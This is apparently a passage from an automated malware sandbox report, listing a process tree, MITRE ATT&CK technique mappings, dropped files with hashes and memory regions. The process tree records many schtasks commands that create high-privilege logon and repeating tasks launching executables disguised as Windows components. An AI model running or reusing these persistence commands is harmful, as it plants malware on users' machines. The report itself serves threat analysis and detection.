- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Program Files\dotnet\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\dotnet\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files\dotnet\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Desktop\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Public\Desktop\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Desktop\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:3324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Portable Devices\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Windows\schemas\Provisioning\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\schemas\Provisioning\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\schemas\Provisioning\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 6 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDll" /sc ONLOGON /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 9 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3496

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:6060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4316

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:5252

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ServerComponenthostMonitorDll.exe.log

Filesize
1KB

MD5
af6acd95d59de87c04642509c30e81c1

SHA1
f9549ae93fdb0a5861a79a08f60aa81c4b32377b

SHA256
7521ee2d065a78efcab55a194fbd78492f84b70595f139263875f4ea92b194d6

SHA512
93ab99bcf588fde553de3240e0d2b0cbd4e4bc5ef5e99d53f45a267d7ff30103a80b5a7aa1c52d6eff1e070af0ec82d2c0b8aafb7099742aa16810edc1815c3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
09271080b05bfd02104febac0d4e961d

SHA1
aa6c0a89513f5e28c5e37d95c949d582e65d157e

SHA256
7cf15362fedfa29e056424807902b526891a282efc71699f48a3db94dc432d4d

SHA512
8ae138f37de17fca0cdae14d06ade94ceaad691f3bb262ba0d8378d340071c9223f456949ff92c0765fc17f998e4b9b775d5b153b8b66c75c75aee1ca68b2f85

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCBBC.tmp

Filesize
1KB

MD5
4638144ee90cbcf04521f40cfb1dab59

SHA1
1c16b1453874b18b10368cca6ff9366df51b897d

SHA256
c7f742547078e2bb0c23d1d934820a2e5b3597ea98ec27754f0035ed7b53c441

SHA512
36f2e711229699b8a88f810263fc9d41f68981c1b837bdeacb90b155f8d1a5307bd2019de35daa33c610a9b7378a141c5b855c33f90dec224a921e29f5e71a78

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xnq50fci.vi2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\twain_32.exe

Filesize
5.7MB

MD5
1ff26b7d334cd22e726caf72a4208b96

SHA1
d2a1ad17e27c01072ac41d4d20426dd5ca7554ad

SHA256
56ece6be060502193ed0360a8ff7d0633dc7e88d133b28b8a73dfb755d2134db

SHA512
787b02b048dad824dd216a0b33872b2012fc8b2c47d831a33c4eb05399df9a253bd30a8789659a7da0eea8535bb78705685ac67ae546d2f10210c7ba552b4f49

Download Submit
C:\Users\Admin\AppData\Local\Temp\zVf9N2m7nr.bat

Filesize
178B

MD5
10893533ba735a546e49e679c075e9c2

SHA1
54351fb5e25e2dd95026a40a53bba7a0d9458444

SHA256
cb5765a0d8830641b9d186f7762dfd70ac6fd4a5b25d5283233cfc9c38708d53

SHA512
8c0d83899d368fadf403082aabc2cfd0e94cd7122f29aeb77dfcf98d8deb430828625353e8d47956d01c1534467c98ef08712ad9c668b312543b0e5817d9a71f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat

Filesize
200B

MD5
705bbadbf818277ddd38afa10533756b

SHA1
1d5fb39c2793854e8c7d848798e39c659aa3e22d

SHA256
871ef6a27bc10a920ce0890b50bf9926b7dbd4eea19a97a19bb837be7a97e5f3

SHA512
f8c46c4e4e31445a397af9f437b86b15edd48047c24f9c78f0e49efa28ea293465cb7aef242e71b2d127deba3827aee8f00c7cc11085f8c05a771b1cfbf36c31

Download Submit
C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe

Filesize
230B

MD5
3ef9810ceb57153ab80dd204f33e7f91

SHA1
3fd4057ecad16cf11f2cab6d0ad44be3bd4b0e3f

SHA256
d88a8b553f99f796c80a9e7cc41534b43fab45c7b13fd1d52c9b580d541a272e

SHA512
e65cad2c807bf012d13842dac72bd2436d182702fc7bb7fb212487b322a9442504a7c1f42df57e760ac24c322b810ba8c2ffa616dd2acdfb8098bdb5e8012fe9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xlhj3knb\xlhj3knb.0.cs

Filesize
380B

MD5
d4dcf48bd169b67b73b3ed2ca349c343

SHA1
0cbaeeaa093b2fe4fae99195c51a7bba35ba831c

SHA256
e6fcbe7cbc30985ab436fb696825e0719338a969d65a8a873977c63c53108703

SHA512
179e978f7cbdb76fc152a3c887fffdccc2cda41e07426eb4de75c05f8ac0b8d086fde62da8c2c764a63ee51fd20f06972264744bd2408f9d5f46a8f6a3845f02

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xlhj3knb\xlhj3knb.cmdline

Filesize
235B

MD5
3d110d1ec1379910a13bf589cc61569a

SHA1
30e06bdfc9403bab53b1c5e808a73ec2ae2830e8

SHA256
7daec14e7978f360067d6ed4baf3c9e453d856f6edc98918c9b89966d2b8d076

SHA512
bec5c5c00beedbf47a2ef7535254289b4b0c268e251eab31e221dea456327fba4aba77bb8d4bfd07f22d1208735a7812ebe7bad02bd1b4a8f9ceca4a1f755f21

Download Submit
\??\c:\Windows\System32\CSCA0CA6B898C874F42BB2ED23AC8118C1F.TMP

Filesize
1KB

MD5
7bbfaf1199741b237d2493615c95c6d7

SHA1
86d466217c4dc1e0808f83ceda8f4b4df948b5dc

SHA256
e20e4619dbc932a216fd93f86fe0af2e915f4c2ba6177fc3581da59885094476

SHA512
2eda9bf71dc4a4583b7b8e9a6aab0f91d98cca68ee4309df1a4d26541917678da09a15d712397ae4b95fe95b65c8aa6eeab94d7620a5546b3df6c00306ef4a5c

Download Submit
memory/336-342-0x000002804C800000-0x000002804C827000-memory.dmp

Filesize
156KB

Download
memory/336-343-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/392-350-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/392-349-0x00000246875A0000-0x00000246875C7000-memory.dmp

Filesize
156KB

Download
memory/612-335-0x000002A61F6E0000-0x000002A61F701000-memory.dmp

Filesize
132KB

Download
memory/612-346-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/612-345-0x000002A61F740000-0x000002A61F767000-memory.dmp

Filesize
156KB

Download
memory/672-337-0x0000014A10030000-0x0000014A10057000-memory.dmp

Filesize
156KB

Download
memory/672-338-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/868-367-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/868-366-0x000001AE265D0000-0x000001AE265F7000-memory.dmp

Filesize
156KB

Download
memory/948-353-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/948-352-0x0000019ADEB30000-0x0000019ADEB57000-memory.dmp

Filesize
156KB

Download
memory/1088-0-0x0000000000400000-0x0000000000B63000-memory.dmp

Filesize
7.4MB

Download
memory/1088-22-0x0000000000400000-0x0000000000B63000-memory.dmp

Filesize
7.4MB

Download
memory/1092-375-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/1092-374-0x000001E119770000-0x000001E119797000-memory.dmp

Filesize
156KB

Download
memory/1108-387-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/1108-386-0x00000276BD660000-0x00000276BD687000-memory.dmp

Filesize
156KB

Download
memory/1152-378-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/1152-377-0x0000018B82C30000-0x0000018B82C57000-memory.dmp

Filesize
156KB

Download
memory/1216-380-0x00000202D1F40000-0x00000202D1F67000-memory.dmp

Filesize
156KB

Download
memory/1216-381-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/1292-384-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/1292-383-0x000001D169FD0000-0x000001D169FF7000-memory.dmp

Filesize
156KB

Download
memory/1300-390-0x00000201EF880000-0x00000201EF8A7000-memory.dmp

Filesize
156KB

Download
memory/1300-391-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

Filesize
64KB

Download
memory/2120-330-0x00007FF74A210000-0x00007FF74A7D1000-memory.dmp

Filesize
5.8MB

Download
memory/2120-279-0x00007FF74A210000-0x00007FF74A7D1000-memory.dmp

Filesize
5.8MB

Download
memory/2288-86-0x000002006BE90000-0x000002006BEB2000-memory.dmp

Filesize
136KB

Download
memory/4812-42-0x000000001B7D0000-0x000000001B7E8000-memory.dmp

Filesize
96KB

Download
memory/4812-39-0x000000001B390000-0x000000001B3AC000-memory.dmp

Filesize
112KB

Download
memory/4812-50-0x000000001B7F0000-0x000000001B7FC000-memory.dmp

Filesize
48KB

Download
memory/4812-35-0x0000000000560000-0x0000000000758000-memory.dmp

Filesize
2.0MB

Download
memory/4812-46-0x0000000002850000-0x000000000285C000-memory.dmp

Filesize
48KB

Download
memory/4812-37-0x0000000002830000-0x000000000283E000-memory.dmp

Filesize
56KB

Download
memory/4812-48-0x000000001B3B0000-0x000000001B3BE000-memory.dmp

Filesize
56KB

Download
memory/4812-44-0x0000000002840000-0x000000000284E000-memory.dmp

Filesize
56KB

Download
memory/4812-79-0x000000001BAB0000-0x000000001BB59000-memory.dmp

Filesize
676KB

Download
memory/4812-40-0x000000001B820000-0x000000001B870000-memory.dmp

Filesize
320KB

Download
memory/5444-693-0x000001DCC6CE0000-0x000001DCC6CFA000-memory.dmp

Filesize
104KB

Download
memory/5444-688-0x000001DCC6A50000-0x000001DCC6A6C000-memory.dmp

Filesize
112KB

Download
memory/5444-689-0x000001DCC6A70000-0x000001DCC6B25000-memory.dmp

Filesize
724KB

Download
memory/5444-690-0x000001DCC6B30000-0x000001DCC6B3A000-memory.dmp

Filesize
40KB

Download
memory/5444-691-0x000001DCC6CA0000-0x000001DCC6CBC000-memory.dmp

Filesize
112KB

Download
memory/5444-692-0x000001DCC6C80000-0x000001DCC6C8A000-memory.dmp

Filesize
40KB

Download
memory/5444-694-0x000001DCC6C90000-0x000001DCC6C98000-memory.dmp

Filesize
32KB

Download
memory/5444-695-0x000001DCC6CC0000-0x000001DCC6CC6000-memory.dmp

Filesize
24KB

Download
memory/5444-696-0x000001DCC6CD0000-0x000001DCC6CDA000-memory.dmp

Filesize
40KB

Download
memory/5512-290-0x000000001BAE0000-0x000000001BB89000-memory.dmp

Filesize
676KB

Download
memory/5956-334-0x00007FFC7AF70000-0x00007FFC7B02E000-memory.dmp

Filesize
760KB

Download
memory/5956-333-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

Filesize
2.0MB

Download